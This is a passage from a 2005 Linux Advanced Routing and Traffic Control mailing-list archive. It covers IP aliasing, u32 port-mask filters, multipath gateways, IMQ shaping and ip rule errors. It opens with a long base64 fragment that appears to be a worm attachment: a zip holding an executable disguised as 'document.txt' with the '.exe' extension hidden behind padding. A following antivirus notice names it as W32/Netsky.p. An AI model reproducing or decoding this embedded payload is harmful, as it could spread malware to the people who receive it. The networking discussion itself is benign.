RKat5gKOqRdY4LKs/zxGUJKAINtXSMnymD1KMSEkaH6RUlV0ja0Zj99rUKGvw7POqbVY/HXP 7rxgxXBrRIHdMnV7eIb0n8HnYux0zGCtIZ8ysxz7G/I2azZ4x3cODxdE5j2wM6JzQKsH4OmA MgyR6QHGfnAIHYLdM6fUpAJ0wueqMbkctSywQHuGoV2aXcsA3haVwo6AyffBpZ4emhKn96Zt TfMkYwq54xRyslq1OWk6q+qTqSSAPIclEjAEMKs+ilHn5onmaBWvPfkzwzTyA590YK5xz3wU mkupqsfLfWkZeBxyP81jDqHfLmKDwFRZRcP57GPwZYKVKNWWsol58TH3Q0QwyyNv84OfN5BJ /rIMS3KSslKog1MJC0ysI2RDQN/10DfSdYNEeNg+qQ5vmjU3itQvU0YVivTT437+xRWUb2w8 jMCytDQ0CpUpvX4mcy28mjm5RjhTn44muMEQJp8iQnkceXci+f0DxPPZXZaQTJIzHMDt692f T9wr1YR9dPGE4ttq0F3jM8K+qy03REeCHVxZ6pTk+thNcHVNeoOoqNCSjQq382qwTdr4gK6G xeFzvNfQeHWSMePU3GJhWn4Ws13NYWq2iw/uuwg6xW2MHBLy+SFcRa1AkSymjEtq6QZRNiS2 Ye2S+i0EHx2jQM0rcSlWBMm8E7BhYBzyvxuxILMG2DEl/kgYEJ2GUc9oTrmYSjSiRkKLJ1tY hr1F1Z0L4LMy/D1TdRKiboX90U7YbI0+3CNbP95NhvwsFGUAdnDgJ3o8MVLhj+hfY0kyWTLs WuuWrpAb1MzqNVUgqAQE9rxI+ByKZVM47P26XHmI9uAHO6prbj41SY/pSgmV+99Ee4QkwM/z lLW1QuBkLn169pqrj4F8nBltfgFU9rU4XwclNrVWiK29r0uQ3oDaZ/fPHWD+HkL6WOO+s2kN jqtr4MPShAE9H6PIt4U84QQWZRaXBs9jSYJ5UlcQEXyqsO1/XEV56HeOAa8Ao2OrNPKMchH2 y3kYsYVcUoe2aBEJu4X4kClp810CORxG802+Y3LIxEF3xwtimsvaAN6tmum8rq03cHX0JQbJ BNPaVJP/QGdOJGqQHfrNwKV17z/c/04iNTyP4uZ/odsoVdMCOuNA7JkwySHGfk+/vPqYpFI+ x8Z//1JMYQzlIWkG94unNI2y/jbOdccWAq7Hyjtj3zzAmk/sAvKfARF6CHVvdW94Dh5+DIzB eEV1tUKXJsKDVpvJT19RRm2ZI42dMxipmdCMI5zpSxIhJgB47RjB4E8g/BCnyq8LQDgjDqoQ CMGJZhwX3/t1Jkp8DiwDuJzy91dlG2OF+pv79CVJJ16IW1nrfx2FmmyWfGus7JYKRAL3O/lO ETVz6Gr2COCfONzVqqFNw2A6jh09IpEcZIQrVuLGc5IzA2vbB7zi00bKmEpRl6QPi44TBhjQ 0nvkKc6250JZ0KgY0MUArHrJIf204NYzS6kNHSp6kt01sh3idEuPAAABAAIAICAQAAEABADo AgAAAQAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAzP//AGhXWAAA AAAAgICAAP///wDAwMAA/wAAAAD//wC/AAAAAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ACIhEiIiIiIiIiIiIiIiIiIiITVVVVVVVVVVVVVVJSIiIiNERERERERERERERFJSIiIjRERE REREVVRERVVSUiIiI0SIiIhESZlERJmUUlIiIiNERERERESVRERJVFJSIiIjRIiIiIhESVVV WVRSUiIiI0RERERERESZmZlUUlIiIiNEiIiIiIhESVRJVFJSIiIjRERERERERESVSVRSUiIi I0SIiIiIiIhESVlUUlIiIiNERERERERERESZVFJSIiIjRIiIiIiIiIhESURSUiIiI0RERERE REREREREUlIiIiNEiIiIiIiIiIiIRFJSIiIjRERERERERERERERSUiIiI0SIiIiIiIiIiIhE UlIiIiNERERERERERERERFJSIiIjRCIiIiJEiIiIiERSUiIiI0Q5kkRCREREREREUlIiIiNE MiIiIkSIiIiIRFJSIiIjRDRCd3JERERERERSUiIiI0QyIndyRIiIiIhEUlIiIiNENEJ3ckRE RERERFJSIiIjRDRCZmJERERERERSUiIiI0Q0QmZiREREREREUlIiIiNEMzIiIkRERERERFJS IiIjRERERERERERERERSUiIiI0JEJEJEJEJEJEJEMlIiIiNCRCRCRCRCRCRCRDJSIiIiJDND NDNDNDNDNDNDIiIiIiIiIiIiIiIiIiIiIiIi4AAAD+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAA B+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfg AAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH+AAAD/////+hHOgwQAFp wP1DA8AFwzieJiijEAPB+BAl/3+HAMOLRCRVBBLpVezsUQdTVlcz/zGJffzUFRxgICiL8GjI wDcPt0UIUGRWJhgh2FORFRQyUA4QITvHiYo8dCoWEQwNV2iArMBqAvGwEhFA/3VsDIo0CIiD +Pu/VAF1BDPA60HQ2zsD93YY6GH/HAKZuRsBUvH5i4CMMBQDQzveHnLojcz8V+F1bAh9eASK LgkRZ3o5sfwPlNhfXilbybIcgYxkDHxWcL5gBAxXjYWcb/OiplBqYCkVLKwNPSgNiCzg+06M 1xS8RvcAgH3+XIs1JMU9v+BF4XQKIiVXBdYhCmjQsC8dgL3ciVyhQjwgIf414aE5EDRhMAlq Zegyu/4QWZM/vQqDUI7KJpEgQbAGr3JECGrbBSjERqPkH8gWPIk9tyMtdFMUNOhsRXZ1IsYD FTg1fFBRWhIJdViWhRLAdAVUTRNGFSM0ERR1GQ9qAecwSBIC9NCQMTDCEAC0ODBAMpAJdCQQ Q1UnbJfOjmnPbQphCJ92j2Ug70Xvbu9j73LveexwK2X8ZM8mV+1vI5tMRA3WL+UWFM0wYkqf ClPZa1lOsydcLvND81p2M6gxcCr/w4U8NWSnLrhTDspGgZ9nmWgVc/lCVJEOhGsZA3X4ZXL2 bwBuZmlnOXguZHFs4RBCSU4YQVJZEEZWA1Byb3RlY5suo3i2MWBcAADgAeAC4CDiEM4RBA3o Fr4RfaQOeyiDRiIBjCgJEIkgFkmJFMDCnwEVgANvCBQHkAJmE8AC0BAJcFX/A7wIUgdBAgYT Co5CKAF3AWxwECif0QQIEHmZg/RE9/0mECKEEOL3jtACEJyRT70YCPCrARnSD48DgFx4wFQH sAOtBFIDOOqvAAAB4CBwQA5LRVJOYEwzMi5kcWzgRuhvBnNlSGFuGO3AWnI+aXQ6Rm4Vvr8p YQscQR1Wn3pHb2ZS53NRdXJjnzZPOqlrDWJhZBYQSWlutm56Sj10Tb5kKWxdsyJG8XB5SVKb 5HRGRMAkV8Frb3dzRN8+5GP56nmlOaAtFE5hbUyGUHLw8mTjnExzanYfTGliO1MvPlRQk0PP 7m40DRhMYbxFctxc68WMTXUIeMxOAwAAAAAAAAAAAAAAAABQSwECFAAKAAAAAABBV0Qyo4gd 3oBzAACAcwAAUwAAAAAAAAAAACAAAAAAAAAAZG9jdW1lbnQudHh0ICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC5l eGVQSwUGAAAAAAEAAQCBAAAA8XMAAAAA ------=_NextPart_000_0016----=_NextPart_000_0016-- From techsupport@sqliaison.com Fri Feb 4 12:50:34 2005 From: techsupport@sqliaison.com (techsupport@sqliaison.com) Date: Fri, 4 Feb 2005 07:50:34 -0500 Subject: [LARTC] SQLiaison E-Mail Virus Alert Message-ID: <000001c50ab8$1e4f4960$50f7cdcd@sqliaison.com> This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C50A8E.35794160 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable SQLiaison Mail Server: GroupShield=C2=99 Alert=20 The email server has discovered a problem with the following email. Please note that the sender of the email will not be notified with this message. > More information : Date/Time sent: 04 Feb 2005 07:50:33 Subject line: [LARTC] Fwd: Warning again From: lartc-admin@mailman.ds9a.nl To: lartc@mailman.ds9a.nl Action taken: Deleted Virus Found: W32/Netsky.p@MM!zip Reason: Anti-Virus Rule Group:=20 For additional information, please contact SQLiaison Support Team techsupport@sqliaison.com =20 =20 ------=_NextPart_000_0001_01C50A8E.35794160 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: 7bit SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.

Please note that the sender of the email will not be notified with this message.

> More information :

Date/Time sent: 04 Feb 2005 07:50:33
Subject line: [LARTC] Fwd: Warning again
From: lartc-admin@mailman.ds9a.nl
To: lartc@mailman.ds9a.nl
Action taken: Deleted
Virus Found: W32/Netsky.p@MM!zip
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team

techsupport@sqliaison.com

 

------=_NextPart_000_0001_01C50A8E.35794160-- From George Alexandru Dragoi Fri Feb 4 13:27:14 2005 From: George Alexandru Dragoi (George Alexandru Dragoi) Date: Fri, 4 Feb 2005 15:27:14 +0200 Subject: [LARTC] routable subnet as aliased IP's? In-Reply-To: <1107508803.42033e435a792@mail.norwesters.org> References: <1107508803.42033e435a792@mail.norwesters.org> Message-ID: <3063e50502040527378be5d5@mail.gmail.com> I think you can just make aliases for all 8 ips (Yes i said 8) ifconfig eth0:0 100.0.43.152 netmask 255.255.255.255 up ifconfig eth0:1 100.0.43.153 netmask 255.255.255.255 up ifconfig eth0:2 100.0.43.154 netmask 255.255.255.255 up ... ifconfig eth0:7 100.0.43.159 netmask 255.255.255.255 up On Fri, 4 Feb 2005 01:20:03 -0800, 3ds@norwesters.net <3ds@norwesters.net> wrote: > Greetings all! > I just got a colocated server space and the ISP has given me an IP address and a > routable /29 subnet. Here's a partial snippet of the info they gave me (with > the real addressess changed for privacy) > > ==== WAN Address > Customer IP Address : 100.0.33.14 > Netmask : 255.255.255.248 > Broadcast Address : 100.0.33.15 > Default Gateway : 100.0.33.9 > ==== Routed Network > IP Address Type : 100.0.43.152/29 Class-C Subnet > Number of IP Addrs : 6 > Domain Name : example.net > Customer IP Addresses : 100.0.43.{153 thru 158} > Netmask : 255.255.255.248 > Broadcast Address : 100.0.43.159 > > And they provided this chart: > - > | > | +----------+ > | | Customer | > |------| Host #1 | > | .154 | | > | +----------+ > - WAN - - Subnet - | > +------+ Net/Mask +----------+ Net/Mask | +----------+ > | ISP | 100.0.33.8 | Customer | 100.0.43.152 | | Customer | > |Router|---- /29 -----|Colocation|---- /248 ----|------| Host #2 | > | | .9 .14 | Router | .153 | .155 | | > +------+ +----------+ | +----------+ > ** REQUIRED ** | > ** DEVICE ** | +----------+ > | | Customer | > |------| Host #n | > | .156 | | > | +----------+ > | > - > > I have a single server with Fedora Core3 (x86-64 2.6.10-1 kernel) installed, and > my intent is to use the iproute2 tools to set up aliases for .154, .155, .156, > etc. and then use IP Virtual Hosts in Apache. > > So, to my question. I could get a router for routing the /29 subnet as the ISP > suggests, but can I use my Linux machine to do this? Can I mount eth0 as > 100.0.33.14 and then setup the 100.0.43.152-158 as aliases and write the routing > so that everything works? I have read chapters 3 and 4 of the LARTC, and I > think it may be possible, but it's just not clicking yet as to how I might be > able to do this. > > And to add one last twist to this... let's say that I can do the above, what if > I wanted to take one of those IP's from the /29 subnet and route it on to > another system plugged into my eth1 while maintaining all of the other IP's as > aliases? > > Am I dreaming? Can you help me? > > Thanks! > Ray > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > -- Bla bla From j.luebbert@kaladix.org Fri Feb 4 18:29:59 2005 From: j.luebbert@kaladix.org (=?ISO-8859-15?Q?J=F6rg_L=FCbbert?=) Date: Fri, 04 Feb 2005 19:29:59 +0100 Subject: [LARTC] U32 port matching trouble Message-ID: <4203BF27.1070007@kaladix.org> Hello, I'm having some trouble with the u32 port match and that is when specifying a mask. tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 27015 0xffff flowid 2:4 Using 27015 0xffff works just fine, all packets to dport 27015 go to 2:4 tc filter add prio 1 dev ppp2 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 27015 0xFFD2 flowid 2:4 Using 27015 0xffd2, no packets go to 2:4. What should happen if my theory below is right is putting ports 27015 - 27050 in 2:4 The way I calculate the mask is: - Convert lowest boundary of port range to binary (27015) - Convert highest boundary of port range to binary (27050) - XOR every bit of the low port with the negated bit of the high port - Convert calculated value to base 16 and use as 0x$MASK So basically I assume that: [ ] I have no idea how the mask field works [ ] There is an error in the implementation Can anyone confirm my understanding of the mask calculation? Can anyone confirm an error in the implementation? I'm running iproute2-ss050112 on a 2.4.28 kernel (with several patches) From Bernardo Silveira Fri Feb 4 19:01:25 2005 From: Bernardo Silveira (Bernardo Silveira) Date: Fri, 4 Feb 2005 17:01:25 -0200 Subject: [LARTC] Multiple gateways setup and timeout connections Message-ID: <28dab43f05020411011c0906c@mail.gmail.com> Hi, I've setup a gateway using multiple default gateways and netfilter MASQUERADE to load balance traffic between two DSL interfaces and one dedicated link, and when I try to download something big, or when I'm using MSN (both in clients under this gateway), sometimes, or most times, after a while the connection timeouts. The connection doesn't seem to change its gateway (verified using ip route list cache) . I've seem a message complaining about a similar problem but it didn't have any solution. Maybe somebody have something new now. Here goes the script I use: #!/bin/bash ip1=3D"192.x.x.1" gw1=3D"192.x.x.254" ip2=3D"192.x.y.1" gw2=3D"192.x.y.254" ip3=3D"200.w.z.141" gw3=3D"200.w.z.129" # Setup source IP routing rules # ADSL1 ip rule add from $ip1 lookup 1 ip route add 192.168.8.0/24 via 192.168.8.1 table 1 ip route add 192.168.3.0/24 via 192.168.3.1 table 1 ip route add 0/0 via $gw1 table 1 # ADSL2 ip rule add from $ip2 lookup 2 ip route add 192.168.8.0/24 via 192.168.8.1 table 2 ip route add 192.168.3.0/24 via 192.168.3.1 table 2 ip route add 0/0 via $gw2 table 2 # ADSL3 ip rule add from $ip3 lookup 3 ip route add 192.168.8.0/24 via 192.168.8.1 table 3 ip route add 192.168.3.0/24 via 192.168.3.1 table 3 ip route add 0/0 via $gw3 table 3 # Setup load balancing ip route add default equalize scope global \ nexthop via $gw1 dev eth1 \ nexthop via $gw2 dev eth2 \ nexthop via $gw3 dev eth3 # Pass Internet traffic to internal network unmodified iptables -t nat -A POSTROUTING -o eth0 -j ACCEPT # Masquerading outbound connections from internal network iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE iptables -t nat -A POSTROUTING -o eth2 -j MASQUERADE iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE #iptables -t nat -A POSTROUTING -s 192.168.8.0/24 -j MASQUERADE #iptables -t nat -A POSTROUTING -s 192.168.3.0/24 -j MASQUERADE Here goes the route garbage collector configuration: net.ipv4.neigh.eth3.gc_stale_time =3D 60 net.ipv4.neigh.eth2.gc_stale_time =3D 60 net.ipv4.neigh.eth1.gc_stale_time =3D 60 net.ipv4.neigh.eth0.gc_stale_time =3D 60 net.ipv4.neigh.lo.gc_stale_time =3D 60 net.ipv4.neigh.default.gc_thresh3 =3D 1024 net.ipv4.neigh.default.gc_thresh2 =3D 512 net.ipv4.neigh.default.gc_thresh1 =3D 128 net.ipv4.neigh.default.gc_interval =3D 30 net.ipv4.neigh.default.gc_stale_time =3D 60 net.ipv4.inet_peer_gc_maxtime =3D 120 net.ipv4.inet_peer_gc_mintime =3D 10 net.ipv4.route.gc_elasticity =3D 1 net.ipv4.route.gc_interval =3D 1 net.ipv4.route.gc_timeout =3D 0 net.ipv4.route.gc_min_interval =3D 0 net.ipv4.route.gc_thresh =3D 2048 The tcpdump traffic goes like this: >From the gateway: 19:08:37.404963 praia1.praiacamboriu.com.br.ftp-data > 141.porttal.com.br.1412: . 11025485:11026945(1460) ack 1 win 58400 (DF) 19:08:37.432250 141.porttal.com.br.1412 > praia1.praiacamboriu.com.br.ftp-data: . ack 11028405 win 8760 (DF) 19:08:37.521619 praia1.praiacamboriu.com.br.ftp-data > 141.porttal.com.br.1412: . 11029865:11031325(1460) ack 1 win 58400 (DF) 19:08:37.527411 praia1.praiacamboriu.com.br.ftp-data > 141.porttal.com.br.1412: . 11028405:11029865(1460) ack 1 win 58400 (DF) 19:08:38.533879 192.168.200.1.1432 > praia1.praiacamboriu.com.br.ftp-data: . ack 4381 win 8760 (DF) 19:08:46.182282 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: . ack 4615497 win 0 (DF) 19:08:51.182479 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: . ack 4615497 win 0 (DF) 19:08:53.664901 praia1.praiacamboriu.com.br.ftp-data > 141.porttal.com.br.1412: . 11028405:11029865(1460) ack 1 win 58400 (DF) 19:08:56.185343 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: . ack 4615497 win 0 (DF) 19:09:01.507109 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: . ack 4615497 win 0 (DF) 19:09:16.253324 192.168.200.1.1432 > praia1.praiacamboriu.com.br.ftp-data: . ack 24821 win 0 (DF) 19:09:23.789876 141.porttal.com.br.1412 > praia1.praiacamboriu.com.br.ftp-data: R 19400787:19400787(0) win 0 (DF) 19:09:23.833381 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: R 20687684:20687684(0) win 0 (DF) 19:09:23.834135 192.168.200.1.1432 > praia1.praiacamboriu.com.br.ftp-data: R 20857536:20857536(0) win 0 (DF) 19:09:26.254170 192.168.200.1.1432 > praia1.praiacamboriu.com.br.ftp-data: R 20857536:20857536(0) win 0 And from the ftp which I was downloading: 15:37:44.490583 praia1.praiacamboriu.com.br.ftp-data > 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254: . ack 1 win 57920 (DF) 15:37:44.493251 praia1.praiacamboriu.com.br.ftp-data > 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254: P 1:1018(1017) ack 1 win 57920 (DF) 15:37:44.670579 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254 > praia1.praiacamboriu.com.br.ftp-data: . ack 1018 win 64518 (DF) 15:37:44.670668 praia1.praiacamboriu.com.br.ftp-data > 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254: FP 1018:2389(1371) ack 1 win 57920 (DF) 15:37:44.738904 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254 > praia1.praiacamboriu.com.br.ftp-data: . ack 2390 win 65535 (DF) 15:37:44.744887 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254 > praia1.praiacamboriu.com.br.ftp-data: F 1:1(0) ack 2390 win 65535 (DF) 15:37:44.744918 praia1.praiacamboriu.com.br.ftp-data > 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254: . ack 2 win 57920 (DF) Thanks, Bernardo Silveira Via IP Solu=E7=F5es para Internet Ltda. From j.luebbert@kaladix.org Fri Feb 4 21:15:30 2005 From: j.luebbert@kaladix.org (=?ISO-8859-1?Q?J=F6rg_L=FCbbert?=) Date: Fri, 04 Feb 2005 22:15:30 +0100 Subject: [LARTC] U32 port matching trouble In-Reply-To: <20050204195956.81019.qmail@web60301.mail.yahoo.com> References: <20050204195956.81019.qmail@web60301.mail.yahoo.com> Message-ID: <4203E5F2.6000004@kaladix.org> Walter Karshat wrote: > A filter specification of > 'match ip dport 0x6980 0xFFC0' > will match a range of 27008 (0x6980) to 27071 > (0x69BF). Just like I thought... Unfortunately this does not work for me :-( tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 0x6987 0xFFD2 flowid 2:4 Whereas this works: tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 0x6987 0xFFFF flowid 2:4 tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 0x6988 0xFFFF flowid 2:4 . . . tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 0x69AA 0xFFFF flowid 2:4 But mostlikely comes at the cost of huge overhead. > Are you certain you need to go all the way to 27050 > with your Half-Life server? Yes, because there are enough internet servers not running within the standard range of 27015 - 27020 but up to 40 or 50 (and of course some non standard ports that I cannot take care of). Thanks again, - Jörg From andy.furniss@dsl.pipex.com Sat Feb 5 12:30:40 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sat, 05 Feb 2005 12:30:40 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <200502011237.24386.rio@martin.mu> References: <200501191657.15767.rio@martin.mu> <200501291829.44294.rio@martin.mu> <41FEBC7A.5030405@dsl.pipex.com> <200502011237.24386.rio@martin.mu> Message-ID: <4204BC70.5030005@dsl.pipex.com> Rio Martin. wrote: > On Monday 31 January 2005 23:17, Andy Furniss wrote: > >>Ahh - I thought that squid could limit connections based on the rate the >>client could sustain. >>You can shape incoming to squid with imq if hooked after nat, because >>its traffic will have real dst address - other will have been denatted. > > > Could you give me some example, how to do that? > Thanks .. > There may be a way to do this with a dummy device soon, but for now you need too patch kernel with imq from http://www.linuximq.net choose to hook after nat (may be default - the first letter in imq kernel config needs to be A) Set up htb with your rules for sharing/ priorotising interactive traffic attached to imq0. In prerouting mangle you can do some marking eg. small tcp/udp to get priority. Then append a rule like this - iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0 Somewhere in you htb setup make a class for you squid traffic and filter traffic to it something like - tc class add dev imq0 parent 1:2 classid 1:33 htb rate 220kbit ceil 480kbit quantum 1500 prio 1 tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 \ match ip dst 220.1.1.1 flowid 1:33 You also need to first modprobe imq if it's a module and bring it up with - modprobe imq numdevs=1 ip link set imq0 up Andy. From dan@coverfire.com Sat Feb 5 14:15:40 2005 From: dan@coverfire.com (Dan Siemon) Date: Sat, 05 Feb 2005 09:15:40 -0500 Subject: [LARTC] ANNOUNCE: LQL# 0.8.0 and LQL 0.8.0 Message-ID: <1107612940.4707.30.camel@ganymede> ****** * Since LARTC is not an announcement list I will not be posting * all release announcements here. LQL has been through several * releases since the initial announcement and LQL-Sharp is * something completely new which will hopefully be of interest to * many of the people subscribed to LARTC. ****** That's right! Yes, yes, yes. You can now control the QoS features of the Linux kernel from a high level language. LQL-Sharp provides a Mono (C#) binding to all of the methods in the LQL library. To show just how easy LQL-Sharp makes manipulating the Linux QoS features I threw together a small demo GUI application last night. Check it out. http://www.coverfire.com/archives/2005/02/04/lql-htb-widget/ What's that? You don't like C#? Well you can use LQL-Sharp with any language supported by Mono. I don't like Mono you say? Well that's OK too. All QoS elements in LQL are implemented as GObjects [1]. This means it is easy to create language bindings to just about any language you like. Native Python bindings should not take more than a couple of days. I would be happy to offer help to anyone wishing to pursue bindings to their favourite language. --------------------------- - LQL-Sharp 0.8.0 (http://www.coverfire.com/lql-sharp/) --------------------------- LQL-Sharp provides Mono (C#) bindings to the LQL library. 0.8.0: * First public release. * Supports all of the features in LQL 0.8.0. --------------------------- - LQL 0.8.0 (http://www.coverfire.com/lql/) --------------------------- The Linux QoS Library (LQL) provides a GPL licensed, GObject based C API to manipulate the network queueing disciplines, classes and classifiers in the Linux kernel. LQL does not use the TC command as a back-end. Instead, LQL communicates with the Linux kernel via Netlink sockets the same way TC does. 0.8.0: * API changes to accommodate the Mono (C#) bindings. * Make "mark" a proper property of LQLClassifierFWMark. * Documentation for the TCIndex methods. [1] - http://developer.gnome.org/doc/API/2.0/gobject/index.html -- OpenPGP key: http://www.coverfire.com/files/pubkey.txt Key fingerprint: FB0A 2D8A A1E9 11B6 6CA3 0C53 742A 9EA8 891C BD98 From rootlinux@yahoo.com Sat Feb 5 14:44:41 2005 From: rootlinux@yahoo.com (root linux) Date: Sat, 5 Feb 2005 06:44:41 -0800 (PST) Subject: [LARTC] How to route certain ports to other link Message-ID: <20050205144442.723.qmail@web30504.mail.mud.yahoo.com> Hi, I have one satellite link and one sdsl link. And, one LAN link. My load balancing is working great with a iptables's masquerading (no fw rules). Now, I need to route the following ports to my sdsl link: - 20, 21, 22, 25, 80, 110, 143, and 443 Whereas the others go to my satellite link. Does anyone done this before? Regards, rootlinux __________________________________ Do you Yahoo!? All your favorites on one personal page – Try My Yahoo! http://my.yahoo.com From pankaj@toughguy.net Sat Feb 5 15:28:20 2005 From: pankaj@toughguy.net (Pankaj Agarwal) Date: Sat, 5 Feb 2005 20:58:20 +0530 Subject: [LARTC] Help - Getting an error when trying to add prio to tables.... Message-ID: <003c01c50b97$62f77940$8d00150a@dreammac> Hi, I am getting the errors given below, when I am trying to add the prio to any table. What can be the problem and how can i resolve it.... Kindly help [root /root]# ip rule RTNETLINK answers: Invalid argument Dump terminated [root /root]# ip rule list RTNETLINK answers: Invalid argument Dump terminated [root /root]# ip rule list table main "ip rule show" need not eny arguments. [root /root]# ip rule show RTNETLINK answers: Invalid argument Dump terminated [root /root]# ip rule add prio 50 table main RTNETLINK answers: Invalid argument [root /root]# ip route 192.168.2.5 dev eth1 scope link 61.11.104.63 dev eth0 scope link 220.227.153.48/28 dev eth2 proto kernel scope link src 220.227.153.61 192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.5 61.11.104.0/24 dev eth0 proto kernel scope link src 61.11.104.63 127.0.0.0/8 dev lo scope link default via 61.11.104.1 dev eth0 [root /root]# ip Usage: ip [ OPTIONS ] OBJECT { COMMAND | help } where OBJECT := { link | addr | route | rule | neigh | tunnel | maddr | mroute | monitor } OPTIONS := { -V[ersion] | -s[tatistics] | -r[esolve] | -f[amily] { inet | inet6 | ipx | dnet | link } | -o[neline] } Thanks and Regards, Pankaj Agarwal From snitt@urbnet.hu Sat Feb 5 17:09:39 2005 From: snitt@urbnet.hu (Endre SZABO) Date: Sat, 5 Feb 2005 18:09:39 +0100 (CET) Subject: [LARTC] Help - Getting an error when trying to add prio to tables.... In-Reply-To: <003c01c50b97$62f77940$8d00150a@dreammac> References: <003c01c50b97$62f77940$8d00150a@dreammac> Message-ID: compile a kernel with the required options checked first, like: CONFIG_IP_ROUTE_MULTIPATH=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ADVANCED_ROUTER=y but i'm not sure if these are the required ones. 73, Snitt .-- Valaszul Pankaj Agarwal levelere: |Hi, | |I am getting the errors given below, when I am trying to add the prio to any |table. What can be the problem and how can i resolve it.... Kindly help | |[root /root]# ip rule |RTNETLINK answers: Invalid argument |Dump terminated | |[root /root]# ip rule list |RTNETLINK answers: Invalid argument |Dump terminated | |[root /root]# ip rule list table main |"ip rule show" need not eny arguments. | |[root /root]# ip rule show |RTNETLINK answers: Invalid argument |Dump terminated | |[root /root]# ip rule add prio 50 table main |RTNETLINK answers: Invalid argument | |[root /root]# ip route |192.168.2.5 dev eth1 scope link |61.11.104.63 dev eth0 scope link |220.227.153.48/28 dev eth2 proto kernel scope link src 220.227.153.61 |192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.5 |61.11.104.0/24 dev eth0 proto kernel scope link src 61.11.104.63 |127.0.0.0/8 dev lo scope link |default via 61.11.104.1 dev eth0 | |[root /root]# ip |Usage: ip [ OPTIONS ] OBJECT { COMMAND | help } |where OBJECT := { link | addr | route | rule | neigh | tunnel | | maddr | mroute | monitor } |OPTIONS := { -V[ersion] | -s[tatistics] | -r[esolve] | |-f[amily] { inet | inet6 | ipx | dnet | link } || -o[neline] } | |Thanks and Regards, | |Pankaj Agarwal |_______________________________________________ |LARTC mailing list / LARTC@mailman.ds9a.nl |http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ | | | From pankaj@toughguy.net Sat Feb 5 17:17:55 2005 From: pankaj@toughguy.net (Pankaj Agarwal) Date: Sat, 5 Feb 2005 22:47:55 +0530 Subject: [LARTC] Help - Getting an error when trying to add prio to tables.... References: <003c01c50b97$62f77940$8d00150a@dreammac> Message-ID: <00a101c50ba6$a6fde160$8d00150a@dreammac> tried these but not working... i edited the file /usr/src/linux/.config CONFIG_IP_ADVANCED_ROUTER=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ROUTE_FWMARK=y CONFIG_IP_ROUTE_NAT=y CONFIG_IP_ROUTE_MULTIPATH=y CONFIG_IP_ROUTE_TOS=y CONFIG_IP_ROUTE_VERBOSE=y CONFIG_IP_ROUTE_LARGE_TABLES=y looking for you help ----- Original Message ----- From: "Endre SZABO" To: "Pankaj Agarwal" Cc: Sent: Saturday, February 05, 2005 10:39 PM Subject: Re: [LARTC] Help - Getting an error when trying to add prio to tables.... > compile a kernel with the required options checked first, like: > > CONFIG_IP_ROUTE_MULTIPATH=y > CONFIG_IP_MULTIPLE_TABLES=y > CONFIG_IP_ADVANCED_ROUTER=y > > but i'm not sure if these are the required ones. > > 73, Snitt > > .-- Valaszul Pankaj Agarwal levelere: > > |Hi, > | > |I am getting the errors given below, when I am trying to add the prio to > any > |table. What can be the problem and how can i resolve it.... Kindly help > | > |[root /root]# ip rule > |RTNETLINK answers: Invalid argument > |Dump terminated > | > |[root /root]# ip rule list > |RTNETLINK answers: Invalid argument > |Dump terminated > | > |[root /root]# ip rule list table main > |"ip rule show" need not eny arguments. > | > |[root /root]# ip rule show > |RTNETLINK answers: Invalid argument > |Dump terminated > | > |[root /root]# ip rule add prio 50 table main > |RTNETLINK answers: Invalid argument > | > |[root /root]# ip route > |192.168.2.5 dev eth1 scope link > |61.11.104.63 dev eth0 scope link > |220.227.153.48/28 dev eth2 proto kernel scope link src 220.227.153.61 > |192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.5 > 